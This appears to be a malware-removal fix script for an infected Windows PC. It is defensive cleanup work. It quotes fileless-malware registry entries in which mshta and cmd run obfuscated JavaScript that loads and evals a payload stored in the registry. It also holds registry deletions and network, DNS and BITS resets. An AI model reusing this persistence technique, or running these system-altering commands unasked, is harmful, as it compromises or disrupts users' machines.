CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\czebe: cmd.exe /c start "" "C:\Users\Dorraine\AppData\Local\Unwe\axcevqyrif.ajpup" "javascript:Wa1KInMM="iDng20";e9e5=new ActiveXObject("WScript.Shell");hMpod7qY7="XF";lqho30=e9e5.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");tpAMDAG6="caqcRX";eval(lqho30);Yr9OkLi="L";" <==== ATTENTION HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc: "C:\WINDOWS\system32\mshta.exe" "javascript:Cst0l="GA9B";P70r=new ActiveXObject("WScript.Shell");NPY7ss7="5t3";Ak1K2K=P70r.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");TCDQ8RjN="9YSa";eval(Ak1K2K);PAL0DE4S="A6skrsbh";" <==== ATTENTION DeleteKey: HKCU\\software\\ppfkbxc DeleteKey: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} => -> No File Shortcut: C:\Users\Dorraine\AppData\Local\Alujen\usatoxuhi.lnk -> C:\Users\Dorraine\AppData\Local\Ygogud Ri\gni mwin.bat () C:\Users\Dorraine\AppData\Local\Ygogud Ri AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125] CMD: bitsadmin /reset /allusers CMD: netsh winsock reset catalog CMD: ipconfig /flushdns RemoveProxy: hosts: Emptytemp: